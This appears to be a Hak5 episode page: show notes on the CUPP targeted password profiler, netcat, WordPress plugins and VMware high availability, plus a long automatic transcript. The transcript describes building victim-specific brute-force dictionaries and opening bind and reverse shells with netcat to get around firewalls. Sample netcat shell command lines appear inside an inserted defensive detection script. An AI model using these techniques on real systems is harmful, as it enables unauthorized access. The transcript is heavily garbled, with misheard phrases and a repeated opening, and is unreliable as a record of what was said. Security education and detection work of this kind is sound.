Matt seemed to be in a bad mood, though....
Seriously, he kinda brought the hate there at the end which brought the thing down, but otherwise another interesting show. Overall glad I subscribed to Hak5.
Common User Password Profiler
The Common User Password Profiler from Remote-Exploit is a password/passphrase generator specifically targeted at an individual user. Feed it some info like names, birth dates, spouse, children and pets and it will generate, on its own or combined with an existing dictionary, thousands of potential passwords. Just add water, feed to your favorite brute forcer and enjoy.
From personal experience I can vouch that, while simple sounding, this would have a HIGH success rate on some of my _former_ (L)users. Administrators take note and enforce BOFH password requirements ;)
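Because the profiler works from a user's own names and dates, a password policy can run the same idea in reverse and reject candidates built from that data. The check below is an added example, not part of the original show notes or of the profiler itself; the profile fields, substitution table and sample user are constructed assumptions.

```python
import re
from datetime import date

# Character substitutions undone before matching. "1" is ambiguous (i or l),
# so two tables are tried. The table is an assumption of this example.
_BASE = {"0": "o", "3": "e", "4": "a", "5": "s", "7": "t",
         "@": "a", "$": "s", "!": "i"}
LEET_TABLES = [str.maketrans({**_BASE, "1": "i"}),
               str.maketrans({**_BASE, "1": "l"})]

# Constructed sample user: names of the person, family and pets, plus birthdays.
SAMPLE_PROFILE = {
    "names": ["Alex Rivera", "Jordan", "Biscuit", "Al"],
    "dates": [date(1982, 11, 21)],
}


def date_fragments(d):
    """Digit strings of four or more characters that encode the date."""
    dd, mm = f"{d.day:02d}", f"{d.month:02d}"
    yy, yyyy = f"{d.year % 100:02d}", f"{d.year:04d}"
    return {yyyy, dd + mm, mm + dd, dd + mm + yy, mm + dd + yy, yy + mm + dd,
            dd + mm + yyyy, mm + dd + yyyy, yyyy + mm + dd}


def profile_tokens(profile):
    """Collect lowercase name parts and date fragments for one user."""
    words = set()
    for value in profile.get("names", []):
        for part in re.split(r"[^A-Za-z]+", value):
            # Very short parts ("Al") would match half the dictionary.
            if len(part) >= 3:
                words.add(part.lower())
    frags = set()
    for d in profile.get("dates", []):
        frags |= date_fragments(d)
    return words, frags


def normalized_forms(password):
    """Lowercased password, with substitutions undone and separators dropped."""
    lowered = password.lower()
    forms = {lowered}
    for table in LEET_TABLES:
        plain = lowered.translate(table)
        forms.add(plain)
        forms.add(re.sub(r"[^a-z]", "", plain))
    return forms


def check_password(password, profile):
    """Return the reasons a password is guessable from the profile ([] = ok)."""
    words, frags = profile_tokens(profile)
    forms = normalized_forms(password)
    digits = re.sub(r"\D", "", password)
    reasons = []
    for word in sorted(words):
        if any(word in form for form in forms):
            reasons.append(f"word:{word}")
    for frag in sorted(frags):
        if frag in digits:
            reasons.append(f"date:{frag}")
    return reasons


if __name__ == "__main__":
    for candidate in ["J0rd@n1982!", "A1ex-Summer", "correct-horse-battery-staple"]:
        print(candidate, check_password(candidate, SAMPLE_PROFILE))
```

Run at password-change time, this rejects the candidate with a reason list; it complements, rather than replaces, length rules and breached-password checks.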
netcat - "The Swiss-army knife for TCP/IP"
When it comes to sending and receiving TCP and UDP any which way from the console, nothing is more versatile or easy to use than netcat.
With a few simple commands you can use netcat to initiate chat, file transfer or even shell access in either direction between a "server" and a "client".
The tool can be set to listen or broadcast on any port, and tied together with some shell-fu, almost anything is possible.
Some listener favorites include cloning hard drives over a network with dd and netcat, tailing a log across the network, port scanning, IP redirecting, or even spoofing user-agents and referrers. Internet Explorer 22 anyone?
Digininja points to this great netcat cheat sheet (PDF 128K).
What kind of crazy stuff have you done with netcat? Feedback@hak5.org
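On the monitoring side, the shell-access use mentioned above is what separates routine netcat use from something worth an alert. This added example (not from the original show notes) classifies process command lines by whether netcat was told to listen and whether a program was attached to the socket; the flag table follows traditional netcat and Ncat, and the log lines are constructed.

```python
import re
import shlex

NETCAT_NAMES = {"nc", "ncat", "netcat", "nc.traditional"}
# Short options that take a value in traditional netcat and Ncat (assumption:
# other builds assign some of these letters differently, -c in particular).
ARG_FLAGS = set("pecgGiosqwT")
LONG_EXEC = {"--exec", "--sh-exec"}  # Ncat long forms of -e / -c

# Constructed process command lines, as a process-creation log would record them.
SAMPLE = [
    "nc -v 192.0.2.10 80",
    r"C:\tools\nc.exe -lvp 1234 -e cmd.exe",
    "/usr/bin/nc 192.0.2.10 1234 -e /bin/bash",
    "nc -l -p 1234",
    "tar czf backup.tgz /etc",
]


def classify(cmdline):
    """Return a finding dict for a netcat command line, None for anything else."""
    try:
        raw = shlex.split(cmdline, posix=False)  # keeps Windows backslashes
    except ValueError:                           # unbalanced quotes in the log
        raw = cmdline.split()
    tokens = [t.strip("\"'") for t in raw]
    if not tokens:
        return None
    exe = re.split(r"[\\/]", tokens[0])[-1].lower()
    if exe.endswith(".exe"):
        exe = exe[:-4]
    if exe not in NETCAT_NAMES:
        return None
    listen, program, port, positional = False, None, None, []
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        if tok in LONG_EXEC:
            i += 1
            program = tokens[i] if i < len(tokens) else ""
        elif tok == "--listen":
            listen = True
        elif tok.startswith("--"):
            pass  # other long options do not change the verdict
        elif tok.startswith("-") and len(tok) > 1:
            # Clustered short flags such as -lvp; a value-taking flag ends the cluster.
            for j in range(1, len(tok)):
                ch = tok[j]
                if ch == "l":
                    listen = True
                elif ch in ARG_FLAGS:
                    value = tok[j + 1:]
                    if not value:
                        i += 1
                        value = tokens[i] if i < len(tokens) else ""
                    if ch in "ec":
                        program = value
                    elif ch == "p":
                        port = value
                    break
        else:
            positional.append(tok)
        i += 1
    if port is None and positional and positional[-1].isdigit():
        port = positional[-1]
    if program is not None:
        verdict = "exec-on-listen" if listen else "exec-on-connect"
    else:
        verdict = "listener" if listen else "client"
    return {"verdict": verdict, "port": port, "program": program}


def alerts(lines):
    """Keep only the invocations that attach a program to the socket."""
    found = []
    for line in lines:
        finding = classify(line)
        if finding and finding["verdict"].startswith("exec-"):
            found.append((finding["verdict"], finding["port"], finding["program"]))
    return found


if __name__ == "__main__":
    for hit in alerts(SAMPLE):
        print(hit)
```

Plain `listener` and `client` verdicts are still worth baselining per host, since file transfers and disk cloning over netcat look identical to exfiltration at this level.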
Shannon's WordPress Plugin Picks
This plugin allows you to automatically post your new posts to Twitter. This is good because the iPod and iPhone, for example, have a large number of Twitter clients to pick from. Your blog posts will reach people while they are walking the streets.
Socialite allows your WordPress posts to publish to Twitter, Facebook, and MySpace. Each social networking site can be enabled or disabled for publishing, and each is configured separately with its own options. Short URL services such as zz.gd and Tinyurl.com are also supported.
Automatically add links to your favorite social bookmarking sites on your posts, pages and in your RSS feed. You can choose from 99 different social bookmarking sites!
MobilePress is a WordPress plugin that will render your WordPress blog on mobile handsets, with the ability to use customized themes. The plugin also allows specific themes for specific devices / mobile browsers, such as iPhone, Opera Mini, Windows CE Mobile and other generic handset browsers.
The plugin will automatically resize an image upon upload, depending on the maximum width and height that you define. Gone are the days when you, or your client, will ruin a site's layout by uploading a huge file with 25 megapixels. Be advised: there is no backup, no copy of the originally uploaded image.
WP-Cache is an extremely efficient WordPress page caching system that makes your site much faster and more responsive. It works by caching WordPress pages and storing them in a static file, so future requests are served directly from the file rather than loading and compiling the whole PHP code and then building the page from the database. WP-Cache can serve hundreds of times more pages per second and reduce the response time from several tenths of a second to less than a millisecond.
Backup the upload directory (images), current theme directory, and plugins directory to a zip file. Zip files optionally sent to email.
Scans your WordPress installation for security vulnerabilities and suggests corrective actions.
It will display a custom ban message when the banned IP, IP range, host name or referer URL tries to visit your blog. You can also exclude certain IPs from being banned. Statistics are recorded on how many times they attempt to visit your blog. It allows wildcard matching too.
Count every viewer and every article view for each blog entry, no matter how and where it is read: pixelstats tracks views of each blog post or page, not only on a single article page but also on each other page where the complete article is shown, i.e. the blog front page, category pages, search result page, archive pages and even RSS fee
Thanks for watching, subscribing, and most of all supporting the show. Custom commissioned WiFi Pineapples running Jasager are still available.
Automatically Generated Transcript (may not be 100% accurate)
" War. Coming up on the show virtualization continued. Can you word press blog with awesome free plugin. Fill the -- dictionary for you -- force attacks. Industries of net -- revealed. All that -- times more on this episode of Hak5. This episode of Hak5 is brought to you by Squarespace. Godaddy game flight and you like to you again look at this episode of -- that I. I'm -- and their kids and I met last and this is your weekly does attack --"
" This week and lots of fun I'm looking forward to tomorrow means and a air -- being eaten. Agreements that need 300 sigma. Which is two point. It's -- bright and sunny day in -- you actually have a woodlands I am you have that Iran and that's a lot more and you know the condition that is. First playing with -- and like inside of the circuits and on a boat were -- would -- conditions -- and when I this is gonna be really sunny and just crank up the senators I mean rules. Cotton. And like he appointments password. And -- it. And -- one thing the common user password pro pilots take a look at this I'm. I'm playing back and backtrack four and neck and that's not checked in the head and there is really cool. Utility over act. Remote exploit and it's I'm gonna caught copy because that's the python permits and it's -- you PP. Our company's passenger. I mean that's like dots flashed up B. They what you -- surgery okay so. If you had run out you get this cute little -- animation here of a how I believe and we're gonna run this and an Iraq and what this is is this helps you generates. Passwords for brute force attack so I'm trying to log into that machine I'm have a huge picture file with like all the stuff and he'd have this lately option grows to like. Now replace numbers letters and stuff like that. That's not really specifically targeted towards Mac it doesn't -- his personality. So this -- generate a it password dictionary list that would be geared towards you and -- in public with it dictionary lists that are created. So and go through with -- how well this bad boy works so we're gonna all Mac. And see surname is Lestock."
" And his nickname is sue. And his birthday is live C eighteen now 2111. Then. 1982. Right okay and he is wife's name we're gonna just say Shannon. Success snubs. What's birthday. Without the through eighteen with my husband. Milton nineteen it in Britain it. Child's -- we're gonna go ahead and -- Paul. A nickname. Camera camera -- camera guy."
" He and my -- girl I didn't know all what what to birthday did."
" Poland and all the pet's name Kirby. I a company in -- Do and add some special stuff yes we can do you really isn't bolts it. -- The browns. Yeah it is that all that's all -- yet to free you know there and he's involved and on sports and learn what or britney's. Actions. -- and then finally. This commerce all of you can go so. This -- is just getting the characters. We're not in his special characters and let us your random numbers at the end of elements to -- narrowed. And and check this out so it creates this picture here -- I just open up and and a Nat. Router. Out. Apple and and every guy out you know is your password camera -- last -- when it. Is is it. Some -- 1980 to five and I don't messiah thing and I."
" Well no seriously okay because -- you know all of this you probably try every single one of those aren't you know now we have nothing to thousands of these try and I think that's on it your domino it did the user that you're trying to break into is dumb enough. If they're not gonna have 92000. Variations in their brain and it's the quick sort. Systems administrator but you know the deal right go to help the personal computer and you're like I just did you log. Right and I even say I don't want your password just go and law again I -- look away once I remember right. This is like. It's Jordan 1993. Why was it two or three that was her son's -- the year human born right okay. But you are when entering this and you already know. And in Canada your attacker. Okay you party will already know all that stuff about Apple why -- it Jordan 1993 the first thing you're gonna try. Yes. It connects the cards or don't users are that smart the good and yeah Jordan now this but it's the -- and just say it. Now this. Is the lights days get eaten those throat and there that you bought at a time. -- Would. -- guys know that we are on a whole plethora. Different. You know there's -- week."
" Yes we and -- didn't read."
" There's other places and hurt. Somebody -- varieties and I think we would get on iTunes is before the iPod."
" If you have not realizing you're not watching this needs to enhance the capability now HD we are in HD's and -- and subscribe to the HCR's as -- warm -- the iTunes. And you got to -- on YouTube and TiVo and Nero and all of those are at the top five dot org well feelings there it is hard to get us. We as far as TiVo you have to have a TiVo connected box -- entry guys are written in its. You spread the techno lust and we're gonna contest that yet does it involve technolust yes wouldn't call the rash no good. I have to think about -- I really do that we're given and you say we'll do that we'll talk about that later anyway I still coming up later and so that's fallen -- virtualization anytime were pressed up. You guys -- the kitchen and we're gonna go find out a little bit about kiddies and Internet. Actually -- its back with money over here."
" So today I want to talk about net cat. Which is kind of like."
" A TC PI PUDP. Read write who it's an open source tool it's cross platform. And this is one of these things are just want to get through this stuff because it's a real fundamental thing. That would going to be expanding on a little bit later was sort of exploits and and stuff like that. It's what what can be considered a Swiss army knife of TC PA peer at least that's what the developers and call it. And we are going to just learn by example here -- want to see some nifty things he can do when your you know sending. TCP or UDP or listening to that he's here UDP and just reading and writing those packets. Over the wire I'm on with -- so let's take a look at these quick examples and I think you're really gonna rock how powerful this tool is. So first of all. If weekend. Go ahead and and read write TCQ let's go ahead and connect to an HTTP server just like we would look like Tom and a web -- something like that. In a fire -- here and backtrack for a better remote exploit awesome stuff. And it's just and see as the command V for -- Burgos and I'm going to go to 101031. Which is a web server on port eighty. And you'll see that I have indeed connected and it knows it's a web server WWW. And I and a right in here and flash HTTP. Slash one point one right. When I do that I again bad request but what's important here. Is that I actually get header. From you know the band error. This of this HTTP server can tell that it's an Apache two point two point eleven server that's what's -- is like -- grabbing seeking justice tool. To say like here using an app or something you found. Hey. You know something interest in you could go. And use this to kind quarry that service whether it's like an HTTP server and ftp server assets whenever right. And in many cases you can get version numbers which are important for when you want to maybe look there's an exploit for that something. 
We can also uses that to as a rudimentary chat so what I'm gonna do here since it's a read and write whole kind of envisioned as a client and server cool. I'm going to be showing you a couple of examples here with my machine and backtracked three anti back -- four and also my Vista machine upstairs so like I said net hat is cross platform so happy here and windows and we're gonna do is demonstrate how we can use it to do rudimentary chat. -- an issue neck hat -- V for for bios and yet -- LP for listen on port one needs 1234. -- the windows machine it just listening on TCP port 12 before or whatever. It it's it's real raw TCP. It's beautiful so we're going to come back to the Linux side. And an issue -- hat technique and I'm gonna give the IP 1010 31. And port 1234. And we've connected. But there's nothing really going on we come back here look at -- to school this over take a look at our. A windows side and we don't have anything interesting. Until I typed hello there we go right so. You know we can have a very rudimentary chat if if you had recently -- and it -- my little reminiscent. But there's a basic idea of how does working -- and it's like raw serial connection but it's at TCP UDP. So -- that give you an idea of -- so we can send data while with some interest in pipes we can actually send some files so let's go ahead and create a file here. And send it. Q our friend the windows machine and this is something that you could use if you want to. Points instance want birds to some real quick easy way didn't have -- set up to a CP file over we're. FT PUT it to -- email or whatever you just get a file across networked real simple like this. So. Word that what we're gonna go ahead and do is listen on. Are certain what will consider our server side so on the witness and indeed attacked -- And listen on port 1234 again. And this time you can see I am going to give it a little walk there. 
And in fact that moment now we're gonna it a file to send it so go ahead and touch Tina here. And -- act oh. Is smoke and two Tina -- Right and now we have but what does -- make sure it's there. Great it's there so I'm going to send that file over to the windows machines using fat cat now I just -- The and and I'm gonna give it the port answered B can and then port which just and and those 31. On port 1234. And now on any given to walk the other direction and saying send this file into you and that file of course is. Press and are actually refuse beautiful because we are not listening. Okay so let's come back over here and say ten. Answer -- and now we're listening and were expecting what every data that we get through there to be pumped. To the -- in effect on the windows side we run this again on the Linux side there are. You went on here as we don't get late night not like you home W again has a beautiful little status indicator when it like a pilot transferred we get no information like that. Since it's long and it's done this and you know break out of it and make sure its there so I'm going to TAR Tina. There it is and I'm going to type. And it's not there outside mean -- he is that. Now there are two other interest seeing examples and I want to show you become a powerful -- I can really get and then. Later on we'll talk about some other amazing stuff he can do the first I want to do is show you guys how you can set up. What's called a cotton and -- direction we're going to bind it a shell or a program or anything like that. To an act cat just as we did this file. So. In this instance what I'm going to deal on the windows side. Is I'm going to set up -- had to listen. But we're also going to have -- bind the CMD. The idea exe or the command prompt so on the windows side here it's and sea tac. The LDP. For listen for those on port. 1234. And Tak EC indeed -- okay so that's listening. For connection. 
Two or 1234 and when it does it's going to bind that to the command prompt. So back over here Lennox and see from -- Kat -- B and I'm going it's a and attend -- 31. And again 1234. Open. And just moment here. There yep you can see I have to -- on the -- tools I can say it now type Tina. And there we go. So. This is a great way to you know quickly set up a show and you don't have this stage or some other nefarious -- so that -- going to be getting into later. Now the thing about this is is seem like one of these machines it's like behind firewall or something like that maybe it was machine on the inside of about corporate network right and we can't just. Port forward Nilly -- we -- we're not public facing and we would like to get back to that machine later from you now that they. The convenience of a packed house for instance well. We can easily. Just listen on an important what we can do is do the reverse of that. We can send the show to a listener so in that and simple we're gonna do is set up. The windows -- here to be the listener and for that and C dash LDP. 1234 so we're listening for votes on port 1234. And let's pretend let's go back over polemic side here let's pretend that this machine is. The machine that's behind the firewall we want to send it. Our. -- so in that instance just like we're doing before with the tacky of CD we're going to send it in bash that'll be. And see attack the and and and and that and a -- 31 because that is public facing. Or in -- instance example an attack -- slash bin. Slash bash which is the equivalent proceed in the and acts. And area would come over here and you don't really see a whole lot just let's just that were connected. But if we issue -- here there we go we actually have a directory listing. And you know we can. Can run top we can. You know run whatever. And we are on that machine. 
Now there's a whole lot of other interesting things you can do with -- has an interest in what countries have you do with it so definitely hit me up feedback Hak5 dot org that. And actually have a couple of user's submitted ones here -- some some crazy ideas that you guys. Do cabins on the rights to tell me that he actually uses this detail log files lot of sense to run process someone's server. You need to go to another computer's monitor it. Without have to -- like the NC session. Up precious Roy mentioned that you can actually use this to DD or to do a disk image of hard drive from one computer to another computer. Over the Internet and I'll have links to to an article on how to do that show notes. Joey Adams. Says that this is a great way to import -- direction which we -- be talking about next week and then puts plastic or his email actually came from domain administrator so he does -- letting. And it. He mentions that you cannot use this is -- like we showed you with the port eighty connecting to -- web server. What he likes to send a user agent Internet Explorer 22. Just really screw with people that check -- there in server logs -- the reaper from like lemon party years like that. Which is. Quite mean anyway. -- that -- awesome tore open source highly recommend check it out -- the Mac as whatever. Have links -- on ways to do this and I want to let you know that we are going to be dealing. The some stuff that involves litter on the right now and then go and and -- and the we have virtualization coming up with and before them let's find out what's going on this week's Lan party."
" Right guys get ready I know you've been waiting for it this -- we airplanes. Goldeneye stories yes that's right. We're gonna be playing over and -- dot Hak5 dot org highs Saturday may thirtieth at the end of this might get prepared. And if you want to check out any cool games and local Lan parties say -- excited about. You can go over to Hak5 land fast Squarespace dot com and sign up and vote for your favorite game. Hey -- has a little bit of information for us about placing."
" That's right want to think Squarespace for sponsoring Lan party and I'm here on our land party page -- nifty feature it looks like I'm just on the page but get this extra button here and posts an entry and I can do just that. Fill in my details here. What's nice and get a rich text editor and it's kind of like a -- he -- easy buttons here that rich media like an added. Image here from the direct pure out. And what's nice is right there with then why copy I can go ahead and grab these little selection boxes and resize my image. Right from within my documents -- it and a volunteer community -- and take a look at how. Versus just a powerful you can get your Squarespace plan. Over Squarespace soc column use coupon code Hak5 and get 10% off the light of your service."
" Thank you Darren and up next we have some. Awesome information from -- about virtualization and over at his office was -- join us."
" Our -- so we are here back in my lovely office in Williamsburg Virginia four part two of our virtualization segment. Or intro or series if you want -- Got a lot of good feedback about the first episode that we did which was basically just a intro into the cost savings associated with virtualization. Today we're gonna do is red tape that's one more step further and instead of going into the cost benefit from going into the a disaster recovery or high availability. Women -- Dusan to show you some best practices. -- implementing a multi post. With sand connected storage. Wore like a cluster or so someone and so port. So let's go ahead and take a look at the white -- here. -- to do is -- and drop the best practices for networking. And storage so let's start with our two -- would say we've got -- to host virtual. Machines like the 900 that I mentioned yesterday. And I only said that I have one but. We don't have the money for a second one. So go ahead and start with post number one. And host number two. And these are both running. VMware yes sex three point five. So by themselves they would be you know great standalone virtual machine hosts however what we want to do is we want to actually utilize. A third box. This is gonna be our master controller or virtual senator server. Virtual senator's gonna connect these two boxes. It's gonna say hey I now -- two posts in this. Landscape if you will. And from there we can actually manage all of the virtual machines from. Virtual center server instead of logging into -- one -- it's a certain set of virtual machines or box to manage a you know another -- of virtual machines so we've got virtual center are all hooked up now we need to hook up. Networking and we do that while best practices state that you should have fully redundant. You know paths to. Each of you war hosts. So now we've got to. Network switches. Intact but we do is. You've got you know you're interconnectivity. 
In coming through so one to hear once there once a year one there. So now if one of these switches goes down. Switch to kicks back in and does its thing now networking is a lot easier in the new version of VMware infrastructure which now called the sphere. Horrible name great product. Which makes it setting up a data center. Network a lot easier. I don't have access to the beta but rest assured as soon as we do get access to it I'll -- and much as -- Ohio exactly setup networking. The other things you wanna do is you want to have a another set of switches. These will be you or. I SCSI switches won't mention broke that don't think we're using blue anymore but -- black. So now we've got two more -- here."
" The tank and we've got our."
" Our -- here obviously. Replicating sand is a little costly -- need to get into the EMC. You know high and people logic actually replicate sand. Stored so we're gonna do is we're actually gonna go ahead and you just like we did -- Yes so this comes down here. And then this one comes down here in this one is here and this from those here. TC aware trying to. To implement yeah this is gets a little crazy however when you think about it in terms of okay. I have one point of failure. Not gonna point one point there point one point so this really becomes then you are single. Point of failure for you know hardware wise now we can try and you know. Alleviate that by going to see a a properly architect a great fifty which is basically in the one. Is a group of -- three in my case three drives in one spindle. Three drives another spindle. Okay so these would each be raid five. In fact. And then once we have all these raid five created. We go ahead. Actually that's wrong. We actually -- these. To a raid. There are intact so. One of these each one of these is a raid five -- Which makes rebuilding should one of these drives fail. Quicker occasional at the rebuild say twelve terabyte -- And also you get the speed of striking across. Raid five -- so you've you've kind of mitigated the problem of having a centralized storage solution. Okay now the nice thing about VMware. Yes sex. Or actually should say virtual center is now bolt on applications that they have you can have. These are asks. Which is I believe dynamic resource sharing. Where it'll monitor if box one is that 80%. And box too is that 20%. You can set a threshold of I would only want these boxes to be you know peak utilization at 60% that's what. View it dot via where virtual senate will do is it will live migrate. Using storage would they called the emotion and all these products have been -- so bear with me. It'll migrate a certain number of the hands. Over here to balance wow. To your. 
-- To your specifications on the other nice thing is like I said with you've got down. The motion. And you can go ahead and live my great with no down time. From this -- say you have hardware failure when your ram sticks his dad or you know you've got upgrades that you need to do to the biased results some funky thing. You can actually push everything over with. Like minimal interruption in service we're talking less then. Five seconds. Where you could push all the virtual machines and then you could safely. You know bring this machine down war. You know upgraded and then from here push everything over to the same to this one. So here is the ideal. Set up for you or VMware implementation. Sand. Redundant switches. Redundant switches for your network. Redundant controllers. And if you want it to you can even have multiple virtual center controllers. Now then I guess said I gotta Lotta good comments about my set up my set up is. Like a -- beginning of last week not ideal single point failure and server. You know sands space is an an issue not only got one network. This is a very costly set up not only do two you know licensing fees what actually all the hardware that you're gonna need to purchase however. This is probably the easiest ways to do high availability which is exactly what we've got set up here. Dynamic resource sharing. Think about you know of that when your implementing a solution for us he's a software which is. Millions of dollars in in which might -- these cases this AP so. You know -- you know however much it is -- 12550000. Dollars in in implementation like this you can actually get away with. And your cap X budgets are tight. But. I really think if you haven't already. Go ahead should mean email with your questions matter Hak5 or post month forums. -- but if you have any questions about you know how to architect virtualization. I'm probably I'm sure I'm probably missed something here but. 
-- now me I'll be sure to answer it on an upcoming episode when we actually showed you how to. Set these things up so for more on this head on over to -- on dot com or. --"
" Our guys once again it's time to tell you guys about trivia or so the walk is called now first of all we have to talk about that monkey contest. The winner is announced right now and it's things. Spike CD you -- we went through a lot of is awesome submissions everybody did a great job I if I can give you a Little League trophy all what. But we're actually getting -- CP an epic sock monkey Amazon's that it is very -- like this pictures. From. -- There -- And that's what a legitimate -- coding challenges going on. You can get all the details. -- to challenge PHP. Two Gmail pads and a lot of fun -- so RTC's great submissions. They're still coming days to get in on it so make sure you check that out. The winner of such contests announced next week and -- 512 will win. The awesome if you reference book by -- and it is really enjoy that. And before we get to this week's. --"
" thank you so much for sponsoring this episode of tax side. If you want to make an impact online godaddy.com has what you need dot com names as low as dollars 99 plus world class hosting -- web site builders and much more. In that he is could hack one that is JK one -- can get 10% off your order. Some restrictions apply see the website for details and get your piece of the Internet and godaddy.com. Darren take --"
" Alright so here it is this week's. Contest. Saying he is actually in Easter egg hunt. So I think you guys are really going to enjoy this pixel what you already learned in this episode and apply it RTT."
" Dot Hak5. Dot org that's your only -- are right. And next week we'll talk about it and do some stuff and basically you get in on this Easter egg hunt here and find the answer. And you'll find how to submit it when you find the answer. You will be eligible to win not only a lock of matte hair but a deluxe Hak5 hack packs and -- months. So anyway I hope you guys get in on that and right now and you can get tackled British and find out about word press -- to -- your blog."
" So this past week I have been travelling all over the word press -- looking for my favorite one again so I went through hundreds of them. And I found us what would you would column. My top ten. The first one want to talk about is twit me it basically takes your blog post and transfers it straight over to Twitter. And I have up example moderate hearing just -- that this is a test an automatic medically types and whatever you want it to and it gives a link over to use. York luck. The second one I want to talk about. Is called socialite -- does pretty much the exact same thing except that works for FaceBook MySpace and Twitter. I personally like twit anymore for Twitter so I just you socialite bespoke. In MySpace so I can get all my blog post transfer Everett all sorts of different social networks at the same exact time. Sociable is pretty cool this one actually gives you. A whole bunch -- share this icons and you have 99 different ones to choose from you can choose your favorite wants to link to you. Mary -- that's all you need enough. The next one I found out about what's called mobile press this and I can actually show you on my phone it actually made it might. Log into a mobile blog. So it shows up perfectly clean and clear for anybody who wants to go on my blog on there. On their cell phones except for some reason it doesn't work from Blackberry it just works on iphones and palms. From what I know. My favorite line is can't resize at upload -- This one basically takes your images that you upload -- blog to any of your new entries. And automatically turns Bennett in two years defiant width and height and nothing over the maximum that you issues so on my site I made all of my turn. Turn out to be less than 500. No more than 500 or -- it'll copy everything on the side -- here you can see. This picture actually is about at a now 1024 by 768 or something and and I made it. A whole 500 pixels wide. The next plug in that I've found is called WP security scan. 
It scans your WordPress installation for security vulnerabilities. And it suggests corrective action so on mine you can see I have a certain version and I have the latest stable version. I don't have any. I have a table prefix that is not WP. In at stop at the bottom it says that I have admin. An admin users that still exist I should probably fix that and it gives me some ideas on how to fix it right click the button. It says how to change WordPress admin username so it gives me ideas on how to fix that. Okay WordPress Backup that's really good tool for pretty much everybody to have it backs up pretty much your entire database of your blog and automatically emails it to whatever email address that you want it to you. I decided to make mine email me. Once a week with all of my database files in one zip file it's a great program for anybody who's worried about losing their information on their website. WP-Ban is one of my favorites. I've used it since I first started off with my blog and it's very very helpful if you have anybody go into your site that spans the latter says -- thing means yet. Whatever it bans IPs and IP ranges -- names and referer URLs that try to visit your blog. You can even redirect it to go to other web sites so I have one of mine going to. I think it's this. I -- a new image. It works really well so I definitely. What you get to -- it right. The very last one that I want to tell you about is called pixel stats. Pixel stats is basically basically very minimal. Google Analytics for your website if you're not really into the whole thing in you know you're interested in how many views you have. You're interested in a couple of those things but you don't really care about the analytics -- keywords that people actually -- then it -- to your blog. You contrivance pixels that's just gives you total views you need to use unique visitors just a couple of things that here. A little interested but not that much. If you guys have any interesting. 
Plugin or even widgets for your blogs that you want to check out definitely hit me up at feedback at Hak5 dot org and tell me what you think."
" I think we're going to end the show now. -- go grab the guys. Hey guys that absent that an -- by. The buttons and."
" Rock and and until nine -- a huge fan of it as he is this next to stroh's and."
" It's the only download information please think before we talk about that."
" It is -- all that stuff."
" I want to let everybody knows that. Dean Klein is enemies -- they are the largest online video game rental service and offer choice of over 6000 new and classic titles -- all councils and elves which plants are you 15951. Game by members can rent one to four games at a time and keep them for as long. As they like you can also purchase a game you fall in love with it adults into the box and manual. Pornography. And on over to gain slide dot com slash Hak5 to get. Two week free trial membership -- line dot com."
" Slash -- I can't see it's. All Italy where it or just finishing that's great sounds the rent in China that they had to -- content for the hawks but."
" It's a -- game but it."
" Did send it back isn't short your plan leopard gays and our bill it's really mentions the night before so I'm always."
" Unhappy Miami's. I tell you -- abouts thinker yeah. We just watched the newest episode of Digg Reel last week it was episode number 67. -- talk to you Mythbusters."
" Yeah that's right -- but it did not have any video from the the one with the rockets smash is it's under the canals and it it."
" Flatten the -- it was so cool and what you guys gotta check it out Revision 3 dot plastic real. It's. My. Oh yeah and Andrew got zapped place. Simple it -- Clinton about it. With the yeah."
" Mr. you've got him. And Texas not -- Yes I'm checking out -- nine point four just in in this accident netbook -- next question is specifically for these talk with you so love that. And it's -- both of -- things look in one. The interface is interesting here we can just like drill down here and it's like all of these little menus and what's what's kind of -- about is when you can these programs just chill up here in the top left. And everything's like -- full screen. So oh you know. Makes it. Well. For doing one thing at a time but. Yeah I'm -- resolution on these little tiny. Bastards. It. -- Thanks it's an awesome firmware bias on. Yet just sticking to backtrack for -- years. And it's. -- Yes we asked about we can talk about getting career -- Is it only -- an ass off. For example now actually I I'll give you the list and certifications and degrees because it's really about the letters after. -- I've actually had -- hundred prefix YouTube because it makes. As an awesome blog post it's immediately along with this flash worked in and it is an excuse our industry. We'll know allocate your writer he doesn't it in a year -- completely. It is it is but here already. And you're looking for something he he actually gave a presentation did you stack is -- video it's about how to go from -- career and eighty hours or less so now president and interest that stuff and creates an expert."
" To remember guys we've got the new Hak5 website launching in the next. We episode next next week. Along with the new story that there has promised a populated with all brand new goodies I know all in there and our. Working -- and it a promotional video for you guys that you can. The really excited about -- and there were one sure who got so -- so you can honestly -- which that's true and -- Hak5 dot org slash stickers to support the show remember iTunes TiVo Miro."
" You two digit technolust are assessed weekly and we like it was the first world for the coming out. There's a reason for that this wouldn't answer -- that and also share your techno clubs. All right guys you see you next week's meantime upon -- it."
" It's."
" Like Leo how are you the girl and that's and we'll get visual basic. All going to call coming. Being used."
" That's -- week."
" War. Coming up on the show virtualization continued. Can you WordPress blog with awesome free plugin. Fill the -- dictionary for you -- force attacks. Industries of net -- revealed. All that -- times more on this episode of Hak5. This episode of Hak5 is brought to you by Squarespace. GoDaddy GameFly and you like to you again look at this episode of -- that I. I'm -- and their kids and I met last and this is your weekly does attack --"
" This week and lots of fun I'm looking forward to tomorrow means and a air -- being eaten. Agreements that need 300 sigma. Which is two point. It's -- bright and sunny day in -- you actually have a woodlands I am you have that Iran and that's a lot more and you know the condition that is. First playing with -- and like inside of the circuits and on a boat were -- would -- conditions -- and when I this is gonna be really sunny and just crank up the senators I mean rules. Cotton. And like he appointments password. And -- it. And -- one thing the Common User Password Profiler take a look at this I'm. I'm playing back in BackTrack 4 and neck and that's not checked in the head and there is really cool. Utility over act. Remote-Exploit and it's I'm gonna caught copy because that's the Python permits and it's -- you PP. Our company's passenger. I mean that's like dots flashed up B. They what you -- surgery okay so. If you had run out you get this cute little -- animation here of a how I believe and we're gonna run this and an Iraq and what this is is this helps you generate. Passwords for brute force attack so I'm trying to log into that machine I'm have a huge picture file with like all the stuff and he'd have this lately option grows to like. Now replace numbers letters and stuff like that. That's not really specifically targeted towards Matt it doesn't -- his personality. So this -- generate a password dictionary list that would be geared towards you and -- in public with it dictionary lists that are created. So and go through with -- how well this bad boy works so we're gonna all Matt. And see surname is Lestock."
" And his nickname is sue. And his birthday is live C eighteen now 2111. Then. 1982. Right okay and he is wife's name we're gonna just say Shannon. Success snubs. What's birthday. Without the through eighteen with my husband. Milton nineteen it in Britain it. Child's -- we're gonna go ahead and -- Paul. A nickname. Camera camera -- camera guy."
" He and my -- girl I didn't know all what what to birthday did."
